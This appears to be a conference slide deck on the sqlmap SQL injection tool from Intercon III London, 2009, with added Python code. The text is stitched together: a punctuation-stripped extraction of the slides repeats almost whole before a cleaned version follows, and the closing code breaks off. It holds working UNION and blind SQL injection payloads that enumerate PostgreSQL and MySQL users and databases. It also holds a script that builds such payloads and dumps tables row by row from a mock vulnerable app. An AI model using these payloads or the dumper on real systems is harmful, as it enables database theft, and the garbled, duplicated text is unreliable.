id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not yet support:
SQL injection in SQL clauses other than WHERE
The time-based blind SQL injection technique
...but I am working on these and others.
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
Details on the code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com
References
OWASP Testing Guide, Open Web Application Security Project
Exploit of a Mom, xkcd
Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework, H D Moore and the Metasploit development team
w3af, Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
Python difflib, Python Software Foundation
NULL (SQL), Wikipedia
Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection, Bernardo Damele A. G.
DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Questions
Thanks for your attention
- First
- About me
- SQL what (1/2)
- SQL what (2/2)
- State of art
- How does it work
- sqlmap
- sqlmap features (1/2)
- sqlmap features (2/2)
- Real world
- Dealing with advertisements (1/3)
- Dealing with advertisements (2/3)
- Dealing with advertisements (3/3)
- To NULL or not to NULL (1/4)
- To NULL or not to NULL (2/4)
- To NULL or not to NULL (3/4)
- To NULL or not to NULL (4/4)
- SQL payload (1/3)
- SQL payload (2/3)
- SQL payload (3/3)
- First demo
- Bypass columns limitation (1/4)
- Bypass columns limitation (2/4)
- Bypass columns limitation (3/4)
- Bypass columns limitation (4/4)
- Going partial UNION (1/3)
- Going partial UNION (2/3)
- Going partial UNION (3/3)
- DBMS fingerprint (1/4)
- DBMS fingerprint (2/4)
- DBMS fingerprint (3/4)
- DBMS fingerprint (4/4)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (1/2)
- Automation vs granularity (2/2)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
A possible solution to this problem consists in modifying all the SQL query's columns explicitly:
Casting their output to a string
Returning the value ' ' (a space) if the cast value is still NULL
Example on MySQL 5.0: the SQL query to enumerate the first entry of the column name is
SELECT name FROM test.users LIMIT 0, 1
Cast SQL query:
SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1
To NULL or not to NULL (3/4)
The inferential blind SQL injected statement will then be:
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1), [Nth SQL query output character], 1)) > [bisection algorithm number]
URL encoded, here for the first output character compared against 63:
ORD%28MID%28%28SELECT%20IFNULL%28CAST%28name%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%20FROM%20test.users%20LIMIT%200%2C%201%29%2C%201%2C%201%29%29%20%3E%2063
To NULL or not to NULL (4/4)
You have got an injection point.
The injection point is in a SQL statement as follows:
SELECT * FROM users WHERE id LIKE ((('$_GET[id]'))) LIMIT 0, 1
SQL payload (1/3)
Obstacle:
The injection is after a LIKE clause, within three parentheses, and the statement terminates with a LIMIT clause.
SQL payload (2/3)
In this example the SQL payload that sqlmap identifies is:
id=1'))) AND ((('RaNd' LIKE 'RaNd
In the inferential blind SQL injection algorithm it will be:
id=1'))) AND ORD(MID(([SQL query]), [Nth SQL query output character], 1)) > [bisection algorithm number] AND ((('RaNd' LIKE 'RaNd
In the UNION query SQL injection technique it will be:
id=1'))) UNION ALL SELECT NULL, [concatenated SQL query], NULL AND ((('RaNd' LIKE 'RaNd
The closing quote, the three parentheses and the LIMIT clause are supplied by the application itself, so the original statement still parses.
SQL payload (3/3)
First demo
"I did every demo possible to see if the things would do what they were promising they would do." Doug Hall
You have got an injection point.
It is vulnerable to UNION query SQL injection.
sqlmap detected it for you, by NULL bruteforcing or by ORDER BY clause bruteforcing, depending on your options.
Bypass columns limitation (1/4)
Obstacle:
The number of columns in the web application's SELECT statement is lower than the number of columns of your UNION ALL SELECT statement.
Bypass columns limitation (2/4)
A possible solution consists in concatenating your SELECT statement's columns into a single output by using the DBMS-specific string concatenation operator or function.
Example on PostgreSQL 8.3 to retrieve the users' privileges.
The SQL query to inject is:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
Bypass columns limitation (3/4)
The injection will be:
UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--
The CHR() sequences spell three random marker strings (SrlGVt before the first column, hdzQyZ between columns, KyPADf after the last one) that let sqlmap locate the output in the page and split it back into columns; encoding them with CHR() keeps quotes out of the payload.
Bypass columns limitation (4/4)
Obstacle:
You have got an injection point vulnerable to UNION query SQL injection, but only the query output's first entry (or a range of entries) is displayed in the page content.
Going partial UNION (1/3)
sqlmap automates a known technique:
Changes the parameter value to its negative, causing the original query to produce no output
Inspects and unpacks the provided SQL statement
Calculates the number of entries in its output
Limits it, after the UNION ALL SELECT, to return one entry at a time
Repeats the previous action N times, where N is the number of entries
Going partial UNION (2/3)
Example on MySQL 4.1 to enumerate the list of databases.
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as a non-quoted (integer) parameter in the WHERE clause with the equal operator (simple scenario).
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
Going partial UNION (3/3)
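An added Python example, not sqlmap's code and not from the slides, that builds the concatenated UNION payloads of the Bypass columns limitation and Going partial UNION slides for both the MySQL and the PostgreSQL dialect, parses the marker-delimited output back into columns, and runs the partial UNION procedure end to end. The target is a constructed vulnerable application on an in-memory SQLite database, with CHR() and CONCAT() registered as user functions so that the MySQL- and PostgreSQL-shaped payloads execute unchanged; the users and pg_user sample tables and their rows are made up.

```python
import re
import sqlite3

# Marker strings sqlmap wraps around the concatenated output so it can be
# found in the page and split back into columns: the ones from the
# PostgreSQL slide, decoded. Fixed here (sqlmap draws them at random) so the
# output is reproducible.
START, SEP, END = "SrlGVt", "hdzQyZ", "KyPADf"


def chars(dbms, text):
    """A string literal without quotes, as on the slides: CHAR(a,b,c) on
    MySQL, CHR(a)||CHR(b)||... on PostgreSQL."""
    codes = [str(ord(ch)) for ch in text]
    if dbms == "mysql":
        return "CHAR(%s)" % ",".join(codes)
    return "||".join("CHR(%s)" % c for c in codes)


def cast_column(dbms, column):
    """Cast a column to a string and turn NULL into a single space, so a NULL
    neither breaks the concatenation nor vanishes from the output."""
    if dbms == "mysql":
        return "IFNULL(CAST(%s AS CHAR(10000)), CHAR(32))" % column
    return "COALESCE(CAST(%s AS CHARACTER(10000)), CHR(32))" % column


def concat_columns(dbms, columns, markers=(START, SEP, END)):
    """Fold any number of columns into one expression:
    start || col1 || sep || col2 || ... || end."""
    start, sep, end = markers
    parts = [chars(dbms, start)]
    for i, column in enumerate(columns):
        if i:
            parts.append(chars(dbms, sep))
        parts.append(cast_column(dbms, column))
    parts.append(chars(dbms, end))
    if dbms == "mysql":
        return "CONCAT(%s)" % ", ".join(parts)
    return "||".join(parts)


def union_payload(dbms, columns, table, ncols, position, offset=None,
                  markers=(START, SEP, END)):
    """UNION ALL SELECT with ncols columns (the count found by NULL or
    ORDER BY bruteforcing), the concatenated expression in column
    `position` and NULL elsewhere. With `offset` the statement returns one
    row only: the partial UNION trick for pages showing the first entry."""
    cells = ["NULL"] * ncols
    cells[position] = concat_columns(dbms, columns, markers)
    sql = "UNION ALL SELECT %s FROM %s" % (", ".join(cells), table)
    if offset is not None:
        sql += (" LIMIT %d, 1" % offset) if dbms == "mysql" else (" LIMIT 1 OFFSET %d" % offset)
    return sql


def parse_rows(page, nfields, markers=(START, SEP, END)):
    """Pull every start...end block out of the page and split it on the
    separator, giving one list of nfields strings per row."""
    start, sep, end = markers
    pattern = re.escape(start) + "(.*?)" + re.escape(end)
    rows = [block.split(sep) for block in re.findall(pattern, page, re.S)]
    return [row for row in rows if len(row) == nfields]


def dump_table(send, dbms, columns, table, ncols, position):
    """The partial UNION procedure: negate the parameter so the original
    query returns nothing, count the entries, then fetch them one at a
    time. send(param) -> page text."""
    count_page = send("-1 " + union_payload(dbms, ["COUNT(*)"], table, ncols, position))
    count = int(parse_rows(count_page, 1)[0][0])
    rows = []
    for offset in range(count):
        page = send("-1 " + union_payload(dbms, columns, table, ncols, position, offset))
        rows.extend(parse_rows(page, len(columns)))
    return rows


class FakeApp:
    """Constructed vulnerable application (not from the slides) on an
    in-memory SQLite database. CHR() and CONCAT() are registered so both
    payload dialects above run; the page renders only the first row of the
    result, which is exactly the obstacle."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.create_function("CHR", 1, chr)
        self.db.create_function(
            "CONCAT", -1,
            lambda *a: None if any(x is None for x in a) else "".join(map(str, a)))
        self.db.executescript("""
            CREATE TABLE users (id INTEGER, name TEXT, email TEXT);
            INSERT INTO users VALUES (1, 'admin', 'admin@example.org');
            CREATE TABLE pg_user (usename TEXT, usecreatedb TEXT, usesuper TEXT, usecatupd TEXT);
            INSERT INTO pg_user VALUES ('postgres', 't', 't', 't');
            INSERT INTO pg_user VALUES ('www', 'f', 'f', NULL);
            INSERT INTO pg_user VALUES ('backup', 'f', NULL, 'f');
        """)
        self.requests = 0

    def __call__(self, id_param):
        self.requests += 1
        # the flaw: the parameter is pasted straight into the statement
        sql = "SELECT id, name, email FROM users WHERE id = %s" % id_param
        row = self.db.execute(sql).fetchone()
        if row is None:
            return "<html><body>no such user</body></html>"
        cells = " ".join("" if v is None else str(v) for v in row)
        return "<html><body>%s</body></html>" % cells


if __name__ == "__main__":
    app = FakeApp()
    print(dump_table(app, "postgresql", ["usename", "usecreatedb", "usesuper", "usecatupd"],
                     "pg_user", 3, 1), "in", app.requests, "requests")
```

Three rows cost four requests (one COUNT(*), then one per row); the NULL usecatupd of the second row comes back as a single space, so the column count of every row stays intact when the page is split on the separator.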
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw.
There are a few well-known techniques and a few overlooked ones.
sqlmap implements up to four techniques; three of these are in use by other tools.
The user can force the back-end DBMS software value: no HTTP requests are sent to identify the software.
By default a basic DBMS fingerprint based on one or two techniques is done: only two HTTP requests are sent.
The user can choose to perform an extensive DBMS fingerprint based on four techniques: numerous (30+) HTTP requests are sent.
DBMS fingerprint (1/4)
The techniques implemented to perform an extensive back-end DBMS fingerprint are:
Inband error messages
Banner parsing
SQL dialect
Specific functions' static output comparison
On a default installation all of them are reliable.
On a hardened installation, where error messages are not returned to the client and the banner may not be reachable, the last two remain reliable.
DBMS fingerprint (2/4)
Example of a basic back-end DBMS fingerprint on PostgreSQL 8.3.
The techniques in use are two; the two SQL queries injected to identify it are:
AND [integer]::int=[integer]
SQL dialect (the :: cast operator is PostgreSQL syntax)
AND COALESCE([integer], NULL)=[integer]
Specific function static output comparison
DBMS fingerprint (3/4)
Example of an extensive back-end DBMS fingerprint on Microsoft SQL Server 2005.
The techniques in use are three. The result is:
active fingerprint: Microsoft SQL Server 2005
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399
html error message fingerprint: Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions' static output comparison.
DBMS fingerprint (4/4)
Fingerprinting is a key step in penetration testing.
It is not only about the back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS's underlying system?
sqlmap can fingerprint them without making extra requests:
Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.): a known technique
Back-end DBMS operating system, by parsing the DBMS banner: an overlooked technique
More on fingerprint
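Banner parsing, the fingerprint technique behind the "Service Pack 0 version 9.00.1399" result on the DBMS fingerprint (4/4) slide and the one the More on fingerprint slide reuses to learn the DBMS's operating system, as an added Python example (not sqlmap's code). The sample banners are constructed in the real formats of version() on PostgreSQL and @@version on MySQL and SQL Server; the SQL Server 2005 service pack build table and the Windows NT version table hold the published values.

```python
import re

# Build numbers of the SQL Server 2005 service pack releases; the slide's
# "Service Pack 0 version 9.00.1399" is the RTM build
MSSQL_2005_SP = {"9.00.1399": 0, "9.00.2047": 1, "9.00.3042": 2, "9.00.4035": 3}

# Windows NT kernel versions as they appear in the SQL Server banner
WINDOWS_NT = {"5.0": "Windows 2000", "5.1": "Windows XP", "5.2": "Windows Server 2003",
              "6.0": "Windows Vista / Server 2008", "6.1": "Windows 7 / Server 2008 R2"}

# Constructed sample banners, in the real formats of version() / @@version
SAMPLES = {
    "postgresql": "PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2",
    "mssql": ("Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n"
              "\tOct 14 2005 00:33:37 \n"
              "\tCopyright (c) 1988-2005 Microsoft Corporation\n"
              "\tExpress Edition on Windows NT 5.2 (Build 3790: Service Pack 1)"),
    "mysql": "5.0.51a-3ubuntu5.4-log",
}


def os_family(name):
    """Map a GNU configure triplet ('i486-pc-linux-gnu') or MySQL's
    @@version_compile_os ('Win32', 'debian-linux-gnu') to an OS family."""
    t = name.lower()
    if "linux" in t:
        return "Linux"
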